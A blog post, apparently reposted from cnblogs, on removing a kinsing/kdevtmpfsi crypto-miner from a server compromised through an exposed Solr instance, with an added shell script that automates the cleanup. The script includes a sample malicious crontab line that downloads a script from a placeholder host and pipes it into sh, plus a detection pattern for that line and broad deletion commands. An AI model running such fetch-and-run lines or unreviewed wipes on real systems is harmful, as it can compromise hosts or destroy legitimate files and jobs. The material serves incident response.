How I cleaned a crypto-mining virus off a server

This morning I found the server so sluggish that nothing would open. Running top showed extremely high CPU usage, the classic sign that the server is being used for mining. The complete fix follows.



First, analysis of the cause

I deploy with Docker. docker ps showed only three containers running, so my first guess was that Redis had been attacked.

I then used jps to check whether any Java processes were running, and found one: a Solr instance I had started a few days ago and never shut down.

To sum up: I had changed the Redis port in the Alibaba Cloud console months ago and restricted access to my own IP address, so Redis was not the problem. Solr was the cause. I had forgotten to change its bind address and port and to restrict access to it, and Solr has known vulnerabilities that make an exposed instance easy to attack.

Second, use the find command to locate the miner

find / -name kdevtmpfsi (this is the process name; the command takes a long time, so be patient while it runs, but it will find the file)

Enter the directory it reports and look through the subfolders; you will find the mining files there. Do not delete them yet. Deleting them does nothing, because a daemon process restarts the miner as soon as it is gone.

Third, find the daemon that guards the miner and kill it

kinsing is that daemon; killing it is enough.

If you delete the mining program without first killing the daemon, the daemon will simply restart it every time.

Fourth, delete the daemon's files

Fifth, delete all of the mining program's files

They live in a temporary-files directory, so clearing that directory entirely is fine.


Sixth, kill the mining process

At this point, once it is killed it no longer restarts the way it did before.

If the miner has not come back after a while, you are 90 percent done.


Seventh, the most important step: delete its scheduled tasks!

This step is mandatory. The miner installs a scheduled task that relaunches it at a fixed interval, so the problem may not show today but in a day or two it will be back. Remove the task.

crontab -l   view the scheduled tasks
crontab -r   delete all of this user's scheduled tasks
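The whole procedure above, scripted as an added example that is not the post's own code. The process names kinsing and kdevtmpfsi come from the post; the sample ps and crontab text is constructed, and the function names and the --run flag are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. kinsing (daemon) and
# kdevtmpfsi (miner) are the names the post gives; all else is assumed.
MINER_NAMES="kinsing kdevtmpfsi"

# Print PIDs whose command name is a known miner name, kinsing first so the
# daemon dies before the miner it would otherwise restart.
# $1 is the output of `ps -eo pid,comm` (header line included).
find_miner_pids() {
    for name in $MINER_NAMES; do
        printf '%s\n' "$1" | awk -v want="$name" 'NR > 1 && $2 == want { print $1 }'
    done
}

# Print crontab lines that fetch something from the network and pipe it into
# a shell: the persistence mechanism that relaunches the miner.
# $1 is the output of `crontab -l`.
suspicious_cron_lines() {
    printf '%s\n' "$1" | grep -E '(curl|wget).*\|[[:space:]]*(ba)?sh'
}

# Live cleanup in the post's order: daemon, miner, files, cron entry.
# Run as root; review the printed cron lines before the crontab is cleared.
cleanup() {
    for pid in $(find_miner_pids "$(ps -eo pid,comm)"); do
        kill -9 "$pid" 2>/dev/null && echo "killed $pid"
    done
    # The post's slow `find / -name kdevtmpfsi`, extended to both names
    find / -xdev \( -name kinsing -o -name kdevtmpfsi \) -type f -print -delete 2>/dev/null
    cron="$(crontab -l 2>/dev/null)"
    if [ -n "$(suspicious_cron_lines "$cron")" ]; then
        echo "suspicious crontab entries:"; suspicious_cron_lines "$cron"
        crontab -r   # as in the post: clears the whole user crontab, so re-add legitimate jobs afterwards
    fi
}

# Constructed sample inputs so the helpers can be exercised without a live infection.
SAMPLE_PS='  PID COMMAND
    1 systemd
  842 kinsing
  901 kdevtmpfsi
 1200 redis-server'
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://PLACEHOLDER-HOST/x.sh | sh > /dev/null 2>&1'

if [ "${1:-}" = "--run" ]; then cleanup; fi
```

Run it with --run on the affected host to perform the cleanup; without the flag it only defines the helpers and the constructed samples.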

That's all. Solr really does have a lot of vulnerabilities, so remember to change the port and bind address and to restrict access!!!

Source: www.cnblogs.com/lcbxiuxiu/p/12340454.html